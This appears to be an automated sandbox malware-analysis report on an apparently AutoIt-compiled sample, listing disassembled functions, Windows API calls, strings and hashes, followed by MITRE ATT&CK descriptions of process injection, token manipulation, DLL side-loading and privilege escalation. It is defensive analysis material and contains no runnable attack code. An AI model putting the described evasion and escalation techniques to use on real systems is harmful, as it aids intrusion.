Opcode ID: 3bbaeaebdad02b6e382e2703fabbb940dd62cee7eb2ddcf3a2d17a2eaa9d40e7
Instruction ID: 0f407dfd021c4803f271dbf797abd8cf35a946b595611c0fdb42f3cdbde44092
Opcode Fuzzy Hash: 3bbaeaebdad02b6e382e2703fabbb940dd62cee7eb2ddcf3a2d17a2eaa9d40e7
Instruction Fuzzy Hash: 0A218071700219BECF20EFA4DC81AAE77B5AF44700F100455E559A7281DB30EA45EB62

Function 00CE66D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00CE6761
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00CE676C

Strings

Combobox, xrefs: 00CE672E

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 25d6fe3c075dcd745fc99efa384f0466e5abcfb0acb676d54f2309ed4e7d8341
Instruction ID: 9459237493b2e012ddc26b595da606f8297e70064f3188c70aa7ef81a56367a2
Opcode Fuzzy Hash: 25d6fe3c075dcd745fc99efa384f0466e5abcfb0acb676d54f2309ed4e7d8341
Instruction Fuzzy Hash: D111B271210288AFEF218F55DC81EBB376AEB583A8F100129F92497290D6359D9187A0

Function 00CE6C07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00C61D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00C61D73
Part of subcall function 00C61D35: GetStockObject.GDI32(00000011), ref: 00C61D87
Part of subcall function 00C61D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00C61D91

GetWindowRect.USER32(00000000,?), ref: 00CE6C71
GetSysColor.USER32(00000012), ref: 00CE6C8B

Strings

static, xrefs: 00CE6C4E

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 3b13a85ee91e3bae4efc305f0c8c14959ba3f29542053935d6d8c5b91493d849
Instruction ID: eabc1c9e9139c1a526e2669e68b60b6ee767d839f4ee1b0c2a1f25e52f1bed4a
Opcode Fuzzy Hash: 3b13a85ee91e3bae4efc305f0c8c14959ba3f29542053935d6d8c5b91493d849
Instruction Fuzzy Hash: 24214472620249AFDF04DFA9CC85AEA7BA8FB18354F104628F996D2250E635E8519B60

Function 00CE6920 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 00CE69A2
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00CE69B1

Strings

edit, xrefs: 00CE6986

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 8120cff0dca641315db73591ace7942f55427da5af2f36cab560a22de423eadc
Instruction ID: ae10d7fe288a5216d17a665de1ad9fc868cbbf47f8977d07bedfcd54ea7927b7
Opcode Fuzzy Hash: 8120cff0dca641315db73591ace7942f55427da5af2f36cab560a22de423eadc
Instruction Fuzzy Hash: C2119D71120288ABEB108F669C80AAB3669EB253B8F104728F9B0971E1C731DC51A760

Function 00CC29AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00CC2A22
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00CC2A41

Strings

0, xrefs: 00CC2A18

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: abd4f387a0923dbcfdc05f356fb781f2ddc704007e5090724ecadb5b60e7ab0b
Instruction ID: f850bae561505120997f4244ee834804c712b1a926a47180510456dbf72b1ec0
Opcode Fuzzy Hash: abd4f387a0923dbcfdc05f356fb781f2ddc704007e5090724ecadb5b60e7ab0b
Instruction Fuzzy Hash: 2411C832D05618ABDF30DB98DC44FAEB7B8AB45314F144039E865E7290D770AE06E7A1

Function 00CD21D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00CD222C
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00CD2255

Strings

<local>, xrefs: 00CD221D

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 717a27c3a26f984ac70c0f8aa9ade65a3b716abd00eb7b9642e3660e7da33e78
Instruction ID: 6d0bdee0424c0d0f98f1907e8d7f68b8466a24713132493b7fd2f827e8ffd540
Opcode Fuzzy Hash: 717a27c3a26f984ac70c0f8aa9ade65a3b716abd00eb7b9642e3660e7da33e78
Instruction Fuzzy Hash: 90110270501265BEDB258F12CC84FFBFBA8FF26361F10822BFA2446200D2705A81D6F0

Function 00CB8E05 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C67DE1: _memmove.LIBCMT ref: 00C67E22

Part of subcall function 00CBAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00CBAABC

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00CB8E73

Strings

ListBox, xrefs: 00CB8E3D
ComboBox, xrefs: 00CB8E12

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 791e9f8a2e048618d9b581ffe6739b6a61d4471f7fbd97851bef447f47aff91c
Instruction ID: 752d5781127f42323920e64945a8929aca6b242e973b117eda00b0deceb6cdd8
Opcode Fuzzy Hash: 791e9f8a2e048618d9b581ffe6739b6a61d4471f7fbd97851bef447f47aff91c
Instruction Fuzzy Hash: 94012475641228BBCB24EBA4CC819FE736CEF01320F100A19F871572E1DE31990DEA60

Function 00CC8D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00CC8DAC
__fread_nolock.LIBCMT ref: 00CC8DC1

Strings

EA06, xrefs: 00CC8DF3

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: __fread_nolock_memmove
String ID: EA06
API String ID: 1988441806-3962188686
Opcode ID: 6a447493de7b3a9ec5ed8b000283d6914536bcab13a15227d50959b95f2434a6
Instruction ID: a1fddc9dfb2f59374a68870dc9e2735ea90e9878f03fb1e746ff5d805e1c550b
Opcode Fuzzy Hash: 6a447493de7b3a9ec5ed8b000283d6914536bcab13a15227d50959b95f2434a6
Instruction Fuzzy Hash: DD01F971D042187EDB18DAA8C816EFE7BF8DB11301F00419EF553D2181E8B4A6089760

Function 00CB8CFD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C67DE1: _memmove.LIBCMT ref: 00C67E22

Part of subcall function 00CBAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00CBAABC

SendMessageW.USER32(?,00000180,00000000,?), ref: 00CB8D6B

Strings

ListBox, xrefs: 00CB8D35
ComboBox, xrefs: 00CB8D0A

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: fceef5cfabb796f531ba12a648404bdcdb3609d0a41669ada57d13302dd62c69
Instruction ID: 1003cdebd23236d25e985e07fbe5283cc410fd9fe66ad68d6670ad97edaec166
Opcode Fuzzy Hash: fceef5cfabb796f531ba12a648404bdcdb3609d0a41669ada57d13302dd62c69
Instruction Fuzzy Hash: AF01DF71A41109BBCF25EBA0C992AFE73AC9F25300F10041AB842672E1DE215E0CE671

Function 00CB8D82 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C67DE1: _memmove.LIBCMT ref: 00C67E22

Part of subcall function 00CBAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00CBAABC

SendMessageW.USER32(?,00000182,?,00000000), ref: 00CB8DEE

Strings

ListBox, xrefs: 00CB8DBA
ComboBox, xrefs: 00CB8D8F

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: c9ceeaa6b6be1e06b741db9722a147bb1efe0ba37e2a24d2f05e61df8a5e059a
Instruction ID: 2cf1e78f0d8e18aafa98ecf862fbc288b1a4b178bcbb4e71b204133edefb5083
Opcode Fuzzy Hash: c9ceeaa6b6be1e06b741db9722a147bb1efe0ba37e2a24d2f05e61df8a5e059a
Instruction Fuzzy Hash: 5401A271A41109BBDF25EBA4C982AFE77AC9F21300F10051AB84563292DE254E0DE671

Function 00CC4F28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00CC4F46
_wcscmp.LIBCMT ref: 00CC4F58

Strings

#32770, xrefs: 00CC4F52

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: 32865407a9a6757b5576c878332137dac6c4f2fb11a2b22cb15d34970ebe2dc1
Instruction ID: 36af4aaed14d0101dfe4a99b3e0902e1ebe9fc63dce19dcff4fd087dfaf9f63a
Opcode Fuzzy Hash: 32865407a9a6757b5576c878332137dac6c4f2fb11a2b22cb15d34970ebe2dc1
Instruction Fuzzy Hash: 72E09B325003282AD7209695AC45FE7FBACDB55B60F00015AFD04D6151D9709B4587E0

Function 00C9B2C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00C9B314: _memset.LIBCMT ref: 00C9B321

Part of subcall function 00C80940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00C9B2F0,?,?,?,00C6100A), ref: 00C80945

IsDebuggerPresent.KERNEL32(?,?,?,00C6100A), ref: 00C9B2F4
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00C6100A), ref: 00C9B303

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00C9B2FE

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3158253471-631824599
Opcode ID: 529c285be82967ed6a71a28a4402719f61b50ad1da88c33387a68969a6029638
Instruction ID: b6ebc3077bf743fbfac6078b6f4fea5a8d79c547db11fb99de4a4fa4ee0c49fc
Opcode Fuzzy Hash: 529c285be82967ed6a71a28a4402719f61b50ad1da88c33387a68969a6029638
Instruction Fuzzy Hash: CFE06DB02007409FDB20DF28E50C7567AE4BF00704F00896CE49AC73A0EBB4D949CBB1

Function 00CB7C74 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00CB7C82

Part of subcall function 00C83358: _doexit.LIBCMT ref: 00C83362

Strings

Error allocating memory., xrefs: 00CB7C7B
AutoIt, xrefs: 00CB7C76

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: 93d36edfcadfd6b69f8879e898b8e6909bb47794f94e1a6c0f4cee3254bce9e1
Instruction ID: a77fd61be914f9ccc935fc8a4b748046b777677e89e9e96408f59a6591c47412
Opcode Fuzzy Hash: 93d36edfcadfd6b69f8879e898b8e6909bb47794f94e1a6c0f4cee3254bce9e1
Instruction Fuzzy Hash: A7D05B323C836877D15532A5AC47FDE7A484F05F56F140429FF145A5E34DD1498152FD

Function 00CA1935 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?), ref: 00CA1775

Part of subcall function 00CDBFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,00CA195E,?), ref: 00CDBFFE
Part of subcall function 00CDBFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00CDC010

FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00CA196D

Strings

WIN_XPe, xrefs: 00CA1788

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Library$AddressDirectoryFreeLoadProcSystem
String ID: WIN_XPe
API String ID: 582185067-3257408948
Opcode ID: 9a8e6af58154872372696034a706d700c32cbcb111879389025c58d3b712e264
Instruction ID: 7955bc2ec3bfecfc29d3cfb4cbdfd52ef39b6948b005aec3a9dbff8a1167be2c
Opcode Fuzzy Hash: 9a8e6af58154872372696034a706d700c32cbcb111879389025c58d3b712e264
Instruction Fuzzy Hash: 37F0C97080410ADFDB25DB91CAC8BECBBF8AB19305F582099E512E61A0D7718F85DF60

Function 00CE5998 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00CE59AE
PostMessageW.USER32(00000000), ref: 00CE59B5

Part of subcall function 00CC5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00CC52BC

Strings

Shell_TrayWnd, xrefs: 00CE59A7

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 2bc0c83e90ba9d95484ac52031fb254d196ba2a7cf4bf34a823e6c33f65a8137
Instruction ID: fd04a3df0da64ac245df188a0c9667fffdc7fa6c2047f4b3078d698af9db0030
Opcode Fuzzy Hash: 2bc0c83e90ba9d95484ac52031fb254d196ba2a7cf4bf34a823e6c33f65a8137
Instruction Fuzzy Hash: 14D0C9713853517BE664AB70AC8BFDA6A55AB54B51F000829B245AE1D0C9E0A841C664

Function 00CE5964 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00CE596E
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00CE5981

Part of subcall function 00CC5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00CC52BC

Strings

Shell_TrayWnd, xrefs: 00CE5967

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 7cfe6154136ee5e40e571de2ad823f2fe747fc3da70f104d85bf366a05111405
Instruction ID: b300a34faac786e6c402008e2248939387f619fa41a64bbe6545324ce0a70a21
Opcode Fuzzy Hash: 7cfe6154136ee5e40e571de2ad823f2fe747fc3da70f104d85bf366a05111405
Instruction Fuzzy Hash: 9FD0C971384351BBE664AB70AC8BFDA6A55AB50B51F000829B249AE1D0C9E0A841C664

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

